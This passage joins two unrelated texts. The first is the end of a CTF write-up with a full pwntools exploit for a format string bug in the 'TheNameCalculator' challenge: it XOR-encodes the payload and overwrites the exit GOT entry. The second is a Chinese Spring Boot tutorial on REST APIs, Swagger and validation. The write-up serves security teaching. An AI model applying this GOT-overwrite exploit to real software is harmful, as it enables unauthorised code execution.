`secretFunc`. The function starts with the initialization of some local variables: ![](images/image005.png) It then moves on to zero the `input` buffer: ![](images/image006.png) After that, it performs some bookkeeping related to the stack canary and the old return address, meaning that it would be hard to hijack the flow using a buffer overflow or overriding the return address of the current function. It reads 27 bytes into the local `input` buffer, and then adds the NULL terminator. Then comes the interesting part: ![](images/image007.png) It loops over the input, encrypts it, and outputs it to the user as the "new name". A closer look shows that the new name is outputted using `printf`, where the format string is `input` itself - exposing the program to a Format String vulnerability. We control the input, but the input is encrypted before being passed to `printf`. Therefore, we will have to supply an input which only after "encrypted" will look like a format string. This is possible, since the "encryption" is achieved using XORs between the input and the local `magic_number` variable initialized earlier. The encryption algorithm can be translated to the following: ```c int magic_number = 0x5F7B4153; char* pInputPtr = pInput; while (&pInput[bytes_read - 4] != pInputPtr) { *pInputPtr ^= magic_number; pInputPtr++; } ``` Translated to Python: ```python MAGIC_XOR = 0x5F7B4153 def encrypt(plaintext): b = bytearray(plaintext) magic = p32(MAGIC_XOR) for i in xrange(len(b) - 4): for j in xrange(len(magic)): b[i + j] ^= ord(magic[j]) return b ``` Since the encryption is achieved via XOR, it works both ways - we can encrypt our format string with this algorithm before we send it, and the encryption performed in the program will bring it back to its original form. The next step would be to decide what we want to do with the format string vulnerability. That "what?" is pretty obvious from exploring the assembly - we have a `superSecretFunc` that outputs the flag, and we want to jump to it: ![](images/image008.png) The "how?" is a bit more complicated, given the stack canary and return address verification implemented in `secretFunc`. We could try to override the `fflush` pointer, which is called right after our vulnerable `printf`, buf `fflush` is also used to output the flag in `superSecretFunc`. Instead, we will hijack `exit` which is called from `main` after `secretFunc` returns: ![](images/image009.png) We can use pwntools to get the address of the GOT entry for `exit`: ```python PROC_NAME = "./TheNameCalculator" e = ELF(PROC_NAME) got_exit_addr = e.got['exit'] log.info("got_exit_addr = {}".format(hex(got_exit_addr))) # Returns: got_exit_addr = 0x804a024 ``` And in order to find the format offset, we use pwntools as well: ```python # This function is used to leak the stack using the format string # vulnerability. def send_payload(payload, proc = None): log.info("payload = {} (len = {})".format(repr(payload), len(payload))) if proc is None: proc = process(PROC_NAME) proc.recvuntil("name?") proc.send("X" * 28 + p32(MAGIC_VALUE)) proc.recvuntil("again") enc_payload = encrypt(payload) proc.send(enc_payload) proc.recvuntil("name: ") ret = proc.recvall() log.info("return = {}".format(repr(ret))) return ret # Since the pwntools FmtStr class uses a marker length of 20, and our input # is limited to 27 bytes, we need to shorten the marker to make room for # the rest of the payload. This option isn't provided by pwntools (yet), # so we just override the appropriate function with using inheritance. class FmtStrEx(FmtStr): def find_offset(self): marker_len = 8 marker = cyclic(marker_len) for off in range(1,1000): leak = self.leak_stack(off, marker) leak = pack(leak) pad = cyclic_find(leak) if pad >= 0 and pad < marker_len: return off, pad else: log.error("Could not find offset to format string on stack") return None, None f = FmtStrEx(execute_fmt=send_payload) # Prints: [*] Found format string offset: 12 ``` So we want to write to address 0x804a024 (the GOT `exit` address) the value of the `superSecretFunc` entry point (0x08048596). Since `exit` wasn't called yet, 0x804a024 still contains its original value which is 0x8048476 (a pointer to the lazy binding logic): ``` root@kali:/media/sf_CTFs/noxale/name_calc# gdb ./TheNameCalculator [...] Reading symbols from ./TheNameCalculator...(no debugging symbols found)...done. >>> p/x *0x0804A024 $1 = 0x8048476 >>> disas $1,+10 Dump of assembler code from 0x8048476 to 0x8048480: 0x08048476 <exit@plt+6>: push 0x30 0x0804847b <exit@plt+11>: jmp 0x8048400 End of assembler dump. >>> ``` (You can read a bit more about the GOT's lazy binding [here](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)) Therefore, we just need to override the first WORD - the second word (0x0804) already contains the value we want. The final part of the exploit therefore is: ```python superSecretFunc_addr = e.symbols['superSecretFunc'] log.info("superSecretFunc = {}".format(hex(superSecretFunc_addr))) exploit = bytearray(p32(got_exit_addr)) exploit += "%{}x".format( (superSecretFunc_addr) & (0xFFFF) - (len(exploit)) ) + "%{}$hn".format(f.offset) log.info("exploit = {} (len = {})".format(exploit, len(exploit))) print send_payload(exploit, remote('chal.noxale.com', 5678)) ``` The flag: **noxCTF{M1nd_7he_Input}** The complete exploit: ```python from pwn import * PROC_NAME = "./TheNameCalculator" MAGIC_VALUE = 0x6A4B825 MAGIC_XOR = 0x5F7B4153 # Since the pwntools FmtStr class uses a marker length of 20, and our input # is limited to 27 bytes, we need to shorten the marker to make room for # the rest of the payload. This option isn't provided by pwntools (yet), # so we just override the appropriate function with using inheritance. class FmtStrEx(FmtStr): def find_offset(self): marker_len = 8 marker = cyclic(marker_len) for off in range(1,1000): leak = self.leak_stack(off, marker) leak = pack(leak) pad = cyclic_find(leak) if pad >= 0 and pad < marker_len: return off, pad else: log.error("Could not find offset to format string on stack") return None, None def encrypt(plaintext): b = bytearray(plaintext) magic = p32(MAGIC_XOR) for i in xrange(len(b) - 4): for j in xrange(len(magic)): b[i + j] ^= ord(magic[j]) return b def send_payload(payload, proc = None): log.info("payload = {} (len = {})".format(repr(payload), len(payload))) if proc is None: proc = process(PROC_NAME) proc.recvuntil("name?") proc.send("X" * 28 + p32(MAGIC_VALUE)) proc.recvuntil("again") enc_payload = encrypt(payload) proc.send(enc_payload) proc.recvuntil("name: ") ret = proc.recvall() log.info("return = {}".format(repr(ret))) return ret e = ELF(PROC_NAME) got_exit_addr = e.got['exit'] log.info("got_exit_addr = {}".format(hex(got_exit_addr))) superSecretFunc_addr = e.symbols['superSecretFunc'] log.info("superSecretFunc = {}".format(hex(superSecretFunc_addr))) f = FmtStrEx(execute_fmt=send_payload) exploit = bytearray(p32(got_exit_addr)) exploit += "%{}x".format( (superSecretFunc_addr) & (0xFFFF) - (len(exploit)) ) + "%{}$hn".format(f.offset) log.info("exploit = {} (len = {})".format(exploit, len(exploit))) print send_payload(exploit, remote('chal.noxale.com', 5678)) ```
sec-knowleage
# API开发 --- ## 构建 RESTful API 与单元测试 回顾在入门案例中使用的 @Controller、@RestController、@RequestMapping 注解。 - @Controller:修饰 class,用来创建处理 http 请求的对象 - @RestController:Spring4 之后加入的注解,原来在 @Controller 中返回 json 需要 @ResponseBody 来配合,如果直接用 @RestController 替代 @Controller 就不需要再配置 @ResponseBody,默认返回 json 格式 - @RequestMapping:配置 url 映射。现在更多的也会直接用以 Http Method 直接关联的映射注解来定义,比如:GetMapping、PostMapping、DeleteMapping、PutMapping 等 下面我们通过使用 Spring MVC 来实现一组对 User 对象操作的 RESTful API,配合注释详细说明在 Spring MVC 中如何映射 HTTP 请求、如何传参、如何编写单元测试。 RESTful API具体设计如下: | 请求类型 | URL | 功能说明 | | - | - | - | | GET | /users | 查询用户列表 | | POST | /users | 创建一个用户 | | GET | /users/id | 根据 id 查询一个用户 | | PUT | /users/id | 根据 id 更新一个用户 | | DELETE | /users/id | 根据 id 删除一个用户 | 定义 User 实体 ```java @Data public class User { private Long id; private String name; private Integer age; } ``` 注意:相比 1.x 版本中自定义 set 和 get 函数的方式,这里使用 @Data 注解可以实现在编译器自动添加 set 和 get 函数的效果。该注解是 lombok 提供的,只需要在 pom 中引入加入下面的依赖就可以支持: ```xml <dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId> </dependency> ``` 实现对 User 对象的操作接口 ```java @RestController @RequestMapping(value = "/users") // 通过这里配置使下面的映射都在/users下 public class UserController { // 创建线程安全的Map,模拟users信息的存储 static Map<Long, User> users = Collections.synchronizedMap(new HashMap<Long, User>()); /** * 处理"/users/"的GET请求,用来获取用户列表 * * @return */ @GetMapping("/") public List<User> getUserList() { // 还可以通过@RequestParam从页面中传递参数来进行查询条件或者翻页信息的传递 List<User> r = new ArrayList<User>(users.values()); return r; } /** * 处理"/users/"的POST请求,用来创建User * * @param user * @return */ @PostMapping("/") public String postUser(@RequestBody User user) { // @RequestBody注解用来绑定通过http请求中application/json类型上传的数据 users.put(user.getId(), user); return "success"; } /** * 处理"/users/{id}"的GET请求,用来获取url中id值的User信息 * * @param id * @return */ @GetMapping("/{id}") public User getUser(@PathVariable Long id) { // url中的id可通过@PathVariable绑定到函数的参数中 return users.get(id); } /** * 处理"/users/{id}"的PUT请求,用来更新User信息 * * @param id * @param user * @return */ @PutMapping("/{id}") public String putUser(@PathVariable Long id, @RequestBody User user) { User u = users.get(id); u.setName(user.getName()); u.setAge(user.getAge()); users.put(id, u); return "success"; } /** * 处理"/users/{id}"的DELETE请求,用来删除User * * @param id * @return */ @DeleteMapping("/{id}") public String deleteUser(@PathVariable Long id) { users.remove(id); return "success"; } } ``` 这里相较 1.x 版本,用更细化的 `@GetMapping` 、`@PostMapping` 等系列注解替换了以前的 `@RequestMaping` 注解;另外,还使用 `@RequestBody` 替换了 `@ModelAttribute` 的参数绑定。 至此,我们通过引入 web 模块(没有做其他的任何配置),就可以轻松利用 Spring MVC 的功能,以非常简洁的代码完成了对 User 对象的 RESTful API 的创建以及单元测试的编写。其中同时介绍了 Spring MVC 中最为常用的几个核心注解:@RestController,RequestMapping 以及一些参数绑定的注解:@PathVariable,@RequestBody 等。 --- ## 使用 Swagger 随着前后端分离架构和微服务架构的流行,我们使用 Spring Boot 来构建 RESTful API 项目的场景越来越多。通常我们的一个 RESTful API 就有可能要服务于多个不同的开发人员或开发团队:IOS 开发、Android 开发、Web 开发甚至其他的后端服务等。为了减少与其他团队平时开发期间的频繁沟通成本,传统做法就是创建一份 RESTful API 文档来记录所有接口细节,然而这样的做法有以下几个问题: - 由于接口众多,并且细节复杂(需要考虑不同的 HTTP 请求类型、HTTP 头部信息、HTTP 请求内容等),高质量地创建这份文档本身就是件非常吃力的事,下游的抱怨声不绝于耳。 - 随着时间推移,不断修改接口实现的时候都必须同步修改接口文档,而文档与代码又处于两个不同的媒介,除非有严格的管理机制,不然很容易导致不一致现象。 为了解决上面这样的问题,可以使用 Swagger2,它可以轻松的整合到 Spring Boot 中,并与 Spring MVC 程序配合组织出强大 RESTful API 文档。它既可以减少我们创建文档的工作量,同时说明内容又整合入实现代码中,让维护文档和修改代码整合为一体,可以让我们在修改代码逻辑的同时方便的修改文档说明。另外 Swagger2 也提供了强大的页面测试功能来调试每个 RESTful API。 首先,需要一个 Spring Boot 实现的 RESTful API 工程, 可以用上面的内容 整合 Swagger2, 添加 swagger-spring-boot-starter 依赖 - https://github.com/SpringForAll/spring-boot-starter-swagger 在 pom.xml 中加入依赖,具体如下: ```xml <dependency> <groupId>com.spring4all</groupId> <artifactId>swagger-spring-boot-starter</artifactId> <version>1.9.0.RELEASE</version> </dependency> ``` 应用主类中添加 @EnableSwagger2Doc 注解,具体如下 ```java @EnableSwagger2Doc @SpringBootApplication public class testApplication { public static void main(String[] args) { SpringApplication.run(testApplication.class, args); } } ``` application.properties 中配置文档相关内容,比如 ```conf swagger.title=spring-boot-starter-swagger swagger.description=Starter for swagger 2.x swagger.version=1.4.0.RELEASE swagger.license=Apache License, Version 2.0 swagger.licenseUrl=https://www.apache.org/licenses/LICENSE-2.0.html swagger.termsOfServiceUrl=https://github.com/dyc87112/spring-boot-starter-swagger swagger.contact.name=test swagger.contact.url=http://blog.test.com swagger.contact.email=test@qq.com swagger.base-package=com.test swagger.base-path=/** ``` 各参数配置含义如下: - swagger.title:标题 - swagger.description:描述 - swagger.version:版本 - swagger.license:许可证 - swagger.licenseUrl:许可证URL - swagger.termsOfServiceUrl:服务条款URL - swagger.contact.name:维护人 - swagger.contact.url:维护人URL - swagger.contact.email:维护人email - swagger.base-package:swagger扫描的基础包,默认:全扫描 - swagger.base-path:需要处理的基础URL规则,默认:/** 启动应用,访问:http://localhost:8080/swagger-ui.html 如果启动失败可以看下这几个链接,大部分情况是 spring boot 版本问题 - https://github.com/springfox/springfox/issues/3791 - https://gitee.com/didispace/SpringBoot-Learning/tree/master/2.x/chapter2-2 - https://cloud.tencent.com/developer/article/1815129 - https://www.cnblogs.com/rainbow70626/p/15680184.html **添加文档内容** 在整合完 Swagger 之后,在 http://localhost:8080/swagger-ui.html 页面中可以看到,关于各个接口的描述还都是英文或遵循代码定义的名称产生的。这些内容对用户并不友好,所以我们需要自己增加一些说明来丰富文档内容。如下所示,我们通过 @Api,@ApiOperation 注解来给 API 增加说明、通过 @ApiImplicitParam、@ApiModel、@ApiModelProperty 注解来给参数增加说明。 ```java @Api(tags = "用户管理") @RestController @RequestMapping(value = "/users") // 通过这里配置使下面的映射都在/users下 public class UserController { // 创建线程安全的Map,模拟users信息的存储 static Map<Long, User> users = Collections.synchronizedMap(new HashMap<>()); @GetMapping("/") @ApiOperation(value = "获取用户列表") public List<User> getUserList() { List<User> r = new ArrayList<>(users.values()); return r; } @PostMapping("/") @ApiOperation(value = "创建用户", notes = "根据User对象创建用户") public String postUser(@RequestBody User user) { users.put(user.getId(), user); return "success"; } @GetMapping("/{id}") @ApiOperation(value = "获取用户详细信息", notes = "根据url的id来获取用户详细信息") public User getUser(@PathVariable Long id) { return users.get(id); } @PutMapping("/{id}") @ApiImplicitParam(paramType = "path", dataType = "Long", name = "id", value = "用户编号", required = true, example = "1") @ApiOperation(value = "更新用户详细信息", notes = "根据url的id来指定更新对象,并根据传过来的user信息来更新用户详细信息") public String putUser(@PathVariable Long id, @RequestBody User user) { User u = users.get(id); u.setName(user.getName()); u.setAge(user.getAge()); users.put(id, u); return "success"; } @DeleteMapping("/{id}") @ApiOperation(value = "删除用户", notes = "根据url的id来指定删除对象") public String deleteUser(@PathVariable Long id) { users.remove(id); return "success"; } } @Data @ApiModel(description="用户实体") public class User { @ApiModelProperty("用户编号") private Long id; @ApiModelProperty("用户姓名") private String name; @ApiModelProperty("用户年龄") private Integer age; } ``` 完成上述代码添加后,启动Spring Boot程序,访问:http://localhost:8080/swagger-ui.html,就能看到下面这样带中文说明的文档了 --- ## JSR-303 实现请求参数校验 请求参数的校验是很多新手开发非常容易犯错,或存在较多改进点的常见场景。比较常见的问题主要表现在以下几个方面: - 仅依靠前端框架解决参数校验,缺失服务端的校验。这种情况常见于需要同时开发前后端的时候,虽然程序的正常使用不会有问题,但是开发者忽略了非正常操作。比如绕过前端程序,直接模拟客户端请求,这时候就会突然在前端预设的各种限制,直击各种数据访问接口,使得我们的系统存在安全隐患。 - 大量地使用if/else语句嵌套实现,校验逻辑晦涩难通,不利于长期维护。 所以,针对上面的问题,建议服务端开发在实现接口的时候,对于请求参数必须要有服务端校验以保障数据安全与稳定的系统运行。同时,对于参数的校验实现需要足够优雅,要满足逻辑易读、易维护的基本特点。 **什么是 JSR-303** JSR 是 Java Specification Requests 的缩写,意思是 Java 规范提案。是指向 JCP(Java Community Process) 提出新增一个标准化技术规范的正式请求。任何人都可以提交 JSR,以向 Java 平台增添新的 API 和服务。JSR 已成为 Java 界的一个重要标准。 **JSR-303定义的是什么标准** JSR-303 是 JAVA EE 6 中的一项子规范,叫做 Bean Validation,Hibernate Validator 是 Bean Validation 的参考实现 . Hibernate Validator 提供了 JSR 303 规范中所有内置 constraint 的实现,除此之外还有一些附加的 constraint。 例如: - @AssertFalse 被注释的元素必须为 false - @AssertTrue 被注释的元素必须为 true - @DecimalMax 被注释的元素必须是一个数字,其值必须小于等于指定的最大值 - @DecimalMin 被注释的元素必须是一个数字,其值必须大于等于指定的最小值 等 在JSR-303的标准之下,可以通过这些注解,优雅的定义各个请求参数的校验。 **手动实现参数的校验** 拿任何一个使用Spring Boot 2.x构建的提供RESTful API的项目作为基础 先来做一个简单的例子,比如:定义字段不能为Null 在要校验的字段上添加上@NotNull注解 ```java @Data @ApiModel(description="用户实体") public class User { @ApiModelProperty("用户编号") private Long id; @NotNull @ApiModelProperty("用户姓名") private String name; @NotNull @ApiModelProperty("用户年龄") private Integer age; } ``` 在需要校验的参数实体前添加 @Valid 注解 ```java @PostMapping("/") @ApiOperation(value = "创建用户", notes = "根据User对象创建用户") public String postUser(@Valid @RequestBody User user) { users.put(user.getId(), user); return "success"; } ``` 完成上面配置之后,启动应用,并用POST请求访问localhost:8080/users/接口,body中不包含 age 参数 **尝试一些其他校验** 在完成了上面的例子之后,我们还可以增加一些校验规则,比如:校验字符串的长度、校验数字的大小、校验字符串格式是否为邮箱等。下面我们就来定义一些复杂的校验定义,比如: ```java @Data @ApiModel(description="用户实体") public class User { @ApiModelProperty("用户编号") private Long id; @NotNull @Size(min = 2, max = 5) @ApiModelProperty("用户姓名") private String name; @NotNull @Max(100) @Min(10) @ApiModelProperty("用户年龄") private Integer age; @NotNull @Email @ApiModelProperty("用户邮箱") private String email; } ``` **Swagger 文档中的体现** Swagger 自身对 JSR-303 有一定的支持,但是支持的并那么完善,并没有覆盖所有的注解的。 比如,上面我们使用的注解是可以自动生成的,启动上面我们的实验工程,然后访问 http://localhost:8080/swagger-ui.html,在 Models 不是,我们可以看到如下图所示的内容: 其中:name 和 age 字段相比上一篇教程中的文档描述,多了一些关于校验相关的说明;而 email 字段则没有体现相关校验说明。目前,Swagger 共支持以下几个注解:@NotNull、@Max、@Min、@Size、@Pattern。在实际开发过程中,我们需要分情况来处理,对于 Swagger 支自动生成的可以利用原生支持来产生,如果有部分字段无法产生,则可以在 @ApiModelProperty 注解的描述中他,添加相应的校验说明,以便于使用方查看。 **当请求参数校验出现错误信息的时候,错误格式可以修改吗?** 答案是肯定的。这里的错误信息实际上由 Spring Boot 的异常处理机制统一组织并返回的. **spring-boot-starter-validation是必须的吗?** 在 Spring Boot 2.1 版本中,该依然其实已经包含在了 spring-boot-starter-web 依赖中. --- ## Swagger 接口的分组 我们在 Spring Boot 中定义各个接口是以 Controller 作为第一级维度来进行组织的,Controller 与具体接口之间的关系是一对多的关系。我们可以将同属一个模块的接口定义在一个 Controller 里。默认情况下,Swagger 是以 Controller 为单位,对接口进行分组管理的。这个分组的元素在 Swagger 中称为 Tag,但是这里的 Tag 与接口的关系并不是一对多的,它支持更丰富的多对多关系。 **默认分组** 首先,我们通过一个简单的例子,来看一下默认情况,Swagger 是如何根据 Controller 来组织 Tag 与接口关系的。定义两个 Controller,分别负责教师管理与学生管理接口,比如下面这样: ```java @RestController @RequestMapping(value = "/teacher") static class TeacherController { @GetMapping("/xxx") public String xxx() { return "xxx"; } } @RestController @RequestMapping(value = "/student") static class StudentController { @ApiOperation("获取学生清单") @GetMapping("/list") public String bbb() { return "bbb"; } @ApiOperation("获取教某个学生的老师清单") @GetMapping("/his-teachers") public String ccc() { return "ccc"; } @ApiOperation("创建一个学生") @PostMapping("/aaa") public String aaa() { return "aaa"; } } ``` 启动应用之后,我们可以看到 Swagger 中这两个 Controller 是这样组织的: **自定义默认分组的名称** 通过 @Api 注解来自定义 Tag ```java @Api(tags = "教师管理") @RestController @RequestMapping(value = "/teacher") static class TeacherController { // ... } @Api(tags = "学生管理") @RestController @RequestMapping(value = "/student") static class StudentController { // ... } ``` 再次启动应用之后,我们就看到了如下的分组内容,代码中 @Api 定义的 tags 内容替代了默认产生的 teacher-controller 和 student-controller。 **合并 Controller 分组** 到这里,我们还都只是使用了 Tag 与 Controller 一一对应的情况,Swagger 中还支持更灵活的分组! 我们可以通过定义同名的 Tag 来汇总 Controller 中的接口,比如我们可以定义一个 Tag 为 “教学管理”,让这个分组同时包含教师管理和学生管理的所有接口,可以这样来实现: ```java @Api(tags = {"教师管理", "教学管理"}) @RestController @RequestMapping(value = "/teacher") static class TeacherController { // ... } @Api(tags = {"学生管理", "教学管理"}) @RestController @RequestMapping(value = "/student") static class StudentController { // ... } ``` **更细粒度的接口分组** 通过 @Api 可以实现将 Controller 中的接口合并到一个 Tag 中,但是如果我们希望精确到某个接口的合并呢?比如这样的需求:“教学管理”包含 “教师管理” 中所有接口以及 “学生管理” 管理中的 “获取学生清单” 接口(不是全部接口)。 那么上面的实现方式就无法满足了。这时候发,我们可以通过使用 @ApiOperation 注解中的 tags 属性做更细粒度的接口分类定义,比如上面的需求就可以这样子写: ```java @Api(tags = {"教师管理","教学管理"}) @RestController @RequestMapping(value = "/teacher") static class TeacherController { @ApiOperation(value = "xxx") @GetMapping("/xxx") public String xxx() { return "xxx"; } } @Api(tags = {"学生管理"}) @RestController @RequestMapping(value = "/student") static class StudentController { @ApiOperation(value = "获取学生清单", tags = "教学管理") @GetMapping("/list") public String bbb() { return "bbb"; } @ApiOperation("获取教某个学生的老师清单") @GetMapping("/his-teachers") public String ccc() { return "ccc"; } @ApiOperation("创建一个学生") @PostMapping("/aaa") public String aaa() { return "aaa"; } } ``` --- ## Swagger 元素排序 - https://blog.didispace.com/spring-boot-learning-21-2-4/ --- ## Swagger 静态文档的生成 Swagger2Markup是Github上的一个开源项目。该项目主要用来将Swagger自动生成的文档转换成几种流行的格式以便于静态部署和使用,比如:AsciiDoc、Markdown、Confluence。 - https://github.com/Swagger2Markup/swagger2markup 准备一个使用了Swagger的Web项目 生成 AsciiDoc 文档 生成 AsciiDoc 文档的方式有两种: **通过Java代码来生成** 编辑pom.xml增加需要使用的相关依赖和仓库 ```xml <dependencies> ... <dependency> <groupId>io.github.swagger2markup</groupId> <artifactId>swagger2markup</artifactId> <version>1.3.3</version> <scope>test</scope> </dependency> </dependencies> <repositories> <repository> <snapshots> <enabled>false</enabled> </snapshots> <id>jcenter-releases</id> <name>jcenter</name> <url>https://jcenter.bintray.com</url> </repository> </repositories> ``` 本身这个工具主要就临时用一下,所以这里我们把scope设置为test,这样这个依赖就不会打包到正常运行环境中去。 编写一个单元测试用例来生成执行生成文档的代码 ```java @RunWith(SpringRunner.class) @SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.DEFINED_PORT) public class DemoApplicationTests { @Test public void generateAsciiDocs() throws Exception { URL remoteSwaggerFile = new URL("http://localhost:8080/v2/api-docs"); Path outputDirectory = Paths.get("src/docs/asciidoc/generated"); // 输出Ascii格式 Swagger2MarkupConfig config = new Swagger2MarkupConfigBuilder() .withMarkupLanguage(MarkupLanguage.ASCIIDOC) .build(); Swagger2MarkupConverter.from(remoteSwaggerFile) .withConfig(config) .build() .toFolder(outputDirectory); } } ``` 以上代码内容很简单,大致说明几个关键内容: - MarkupLanguage.ASCIIDOC:指定了要输出的最终格式。除了 ASCIIDOC 之外,还有 MARKDOWN 和 CONFLUENCE_MARKUP,分别定义了其他格式,后面会具体举例。 - from(remoteSwaggerFile):指定了生成静态部署文档的源头配置,可以是这样的 URL 形式,也可以是符合 Swagger 规范的 String 类型或者从文件中读取的流。如果是对当前使用的 Swagger 项目,我们通过使用访问本地 Swagger 接口的方式,如果是从外部获取的 Swagger 文档配置文件,就可以通过字符串或读文件的方式 - toFolder(outputDirectory):指定最终生成文件的具体目录位置 在执行了上面的测试用例之后,我们就能在当前项目的 src 目录下获得如下内容: 可以看到,这种方式在运行之后就生成出了4个不同的静态文件。 **输出到单个文件** 如果不想分割结果文件,也可以通过替换 toFolder(Paths.get("src/docs/asciidoc/generated")) 为 toFile(Paths.get("src/docs/asciidoc/generated/all")),将转换结果输出到一个单一的文件中,这样可以最终生成 html 的也是单一的。 **通过 Maven 插件来生成** 除了通过上面编写 Java 代码来生成的方式之外,swagger2markup 还提供了对应的 Maven 插件来使用。对于上面的生成方式,完全可以通过在 pom.xml 中增加如下插件来完成静态内容的生成。 ```xml <plugin> <groupId>io.github.swagger2markup</groupId> <artifactId>swagger2markup-maven-plugin</artifactId> <version>1.3.3</version> <configuration> <swaggerInput>http://localhost:8080/v2/api-docs</swaggerInput> <outputDir>src/docs/asciidoc/generated-by-plugin</outputDir> <config> <swagger2markup.markupLanguage>ASCIIDOC</swagger2markup.markupLanguage> </config> </configuration> </plugin> ``` 在使用插件生成前,需要先启动应用。然后执行插件,就可以在 src/docs/asciidoc/generated-by-plugin 目录下看到也生成了上面一样的 adoc 文件了。 **生成HTML** 在完成了从 Swagger 文档配置文件到 AsciiDoc 的源文件转换之后,就是如何将 AsciiDoc 转换成可部署的 HTML 内容了。这里继续在上面的工程基础上,引入一个 Maven 插件来完成。 ```xml <plugin> <groupId>org.asciidoctor</groupId> <artifactId>asciidoctor-maven-plugin</artifactId> <version>1.5.6</version> <configuration> <sourceDirectory>src/docs/asciidoc/generated</sourceDirectory> <outputDirectory>src/docs/asciidoc/html</outputDirectory> <backend>html</backend> <sourceHighlighter>coderay</sourceHighlighter> <attributes> <toc>left</toc> </attributes> </configuration> </plugin> ``` 通过上面的配置,执行该插件的 asciidoctor:process-asciidoc 命令之后,就能在 src/docs/asciidoc/html 目录下生成最终可用的静态部署 HTML 了。在完成生成之后,可以直接通过浏览器来看查看,你就能看到类似下图的静态部署结果: ## 找回启动日志中的请求路径列表 Spring构建的Web应用在启动的时候,都会输出当前应用创建的HTTP接口列表。 这些日志接口信息是由 org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping 类在启动的时候,通过扫描 Spring MVC 的 @Controller、@RequestMapping 等注解去发现应用提供的所有接口信息。然后在日志中打印,以方便开发者排查关于接口相关的启动是否正确。 从Spring Boot 2.1.0版本开始,就不再打印这些信息了,完整的启动日志变的非常少. **找回日志中请求路径列表** 为什么在Spring Boot 2.1.x版本中不再打印请求路径列表呢? 主要是由于从该版本开始,将这些日志的打印级别做了调整:从原来的INFO调整为TRACE。所以,当我们希望在应用启动的时候打印这些信息的话,只需要在配置文件增增加对RequestMappingHandlerMapping类的打印级别设置即可,比如在application.properties中增加下面这行配置: ```conf logging.level.org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping=trace ``` 在增加了上面的配置之后重启应用,便可以看到更多的日志打印 --- ## 使用SpringFox3生成Swagger文档 创建一个Spring Boot项目 pom.xml中添加依赖 ```xml <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-boot-starter</artifactId> <version>3.0.0</version> </dependency> ``` 应用主类增加注解 @EnableOpenApi 和 @EnableWebMvc ```java @EnableWebMvc @EnableOpenApi @SpringBootApplication public class DemoApplication { public static void main(String[] args) { SpringApplication.run(DemoApplication.class, args); } } ``` 配置一些接口例子 ```java @Api(tags="用户管理") @RestController public class UserController { @ApiOperation("创建用户") @PostMapping("/users") public User create(@RequestBody @Valid User user) { return user; } @ApiOperation("用户详情") @GetMapping("/users/{id}") public User findById(@PathVariable Long id) { return new User("bbb", 21, "上海", "aaa@bbb.com"); } @ApiOperation("用户列表") @GetMapping("/users") public List<User> list(@ApiParam("查看第几页") @RequestParam int pageIndex, @ApiParam("每页多少条") @RequestParam int pageSize) { List<User> result = new ArrayList<>(); result.add(new User("aaa", 50, "北京", "aaa@ccc.com")); result.add(new User("bbb", 21, "广州", "aaa@ddd.com")); return result; } @ApiIgnore @DeleteMapping("/users/{id}") public String deleteById(@PathVariable Long id) { return "delete user : " + id; } } @Data @NoArgsConstructor @AllArgsConstructor @ApiModel("用户基本信息") public class User { @ApiModelProperty("姓名") @Size(max = 20) private String name; @ApiModelProperty("年龄") @Max(150) @Min(1) private Integer age; @NotNull private String address; @Pattern(regexp = "^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\\.[a-zA-Z0-9_-]+)+$") private String email; } ``` 启动应用!访问 swagger 页面:http://localhost:8080/swagger-ui/index.html SpringFox3 移除了原来默认的 swagger 页面路径:http://host/context-path/swagger-ui.html,新增了两个可访问路径:http://host/context-path/swagger-ui/index.html 和 http://host/context-path/swagger-ui/ 通过调整日志级别,还可以看到新版本的 swagger 文档接口也有新增,除了以前老版本的文档接口 /v2/api-docs 之外,还多了一个新版本的 /v3/api-docs 接口。 --- ## 使用消息转换器扩展XML格式的请求和响应 Spring Boot 中处理 HTTP 请求的实现是采用的 Spring MVC。而在 Spring MVC 中有一个消息转换器这个概念,它主要负责处理各种不同格式的请求数据进行处理,并包转换成对象,以提供更好的编程体验。 在 Spring MVC 中定义了 HttpMessageConverter 接口,抽象了消息转换器对类型的判断、对读写的判断与操作,具体可见如下定义: ```java public interface HttpMessageConverter<T> { boolean canRead(Class<?> clazz, @Nullable MediaType mediaType); boolean canWrite(Class<?> clazz, @Nullable MediaType mediaType); List<MediaType> getSupportedMediaTypes(); T read(Class<? extends T> clazz, HttpInputMessage inputMessage) throws IOException, HttpMessageNotReadableException; void write(T t, @Nullable MediaType contentType, HttpOutputMessage outputMessage) throws IOException, HttpMessageNotWritableException; } ``` HTTP 请求的 Content-Type 有各种不同格式定义,如果要支持 Xml 格式的消息转换,就必须要使用对应的转换器。Spring MVC 中默认已经有一套采用 Jackson 实现的转换器 MappingJackson2XmlHttpMessageConverter。 **引入Xml消息转换器** 在传统Spring应用中,我们可以通过如下配置加入对Xml格式数据的消息转换实现: ```java @Configuration public class MessageConverterConfig1 extends WebMvcConfigurerAdapter { @Override public void configureMessageConverters(List<HttpMessageConverter<?>> converters) { Jackson2ObjectMapperBuilder builder = Jackson2ObjectMapperBuilder.xml(); builder.indentOutput(true); converters.add(new MappingJackson2XmlHttpMessageConverter(builder.build())); } } ``` 在 Spring Boot 应用不用像上面这么麻烦,只需要加入 jackson-dataformat-xml 依赖,Spring Boot 就会自动引入 MappingJackson2XmlHttpMessageConverter 的实现: ```xml <dependency> <groupId>com.fasterxml.jackson.dataformat</groupId> <artifactId>jackson-dataformat-xml</artifactId> </dependency> ``` 同时,为了配置Xml数据与维护对象属性的关系所要使用的注解也在上述依赖中,所以这个依赖也是必须的。 **定义对象与Xml的关系** 做好了基础扩展之后,下面就可以定义Xml内容对应的Java对象了,比如: ```java @Data @NoArgsConstructor @AllArgsConstructor @JacksonXmlRootElement(localName = "User") public class User { @JacksonXmlProperty(localName = "name") private String name; @JacksonXmlProperty(localName = "age") private Integer age; } ``` 其中:@Data、@NoArgsConstructor、@AllArgsConstructor是lombok简化代码的注解,主要用于生成get、set以及构造函数。@JacksonXmlRootElement、@JacksonXmlProperty注解是用来维护对象属性在xml中的对应关系。 上述配置的User对象,其可以映射的Xml样例如下 ```xml <User> <name>aaaa</name> <age>10</age> </User> ``` **创建接收xml请求的接口** 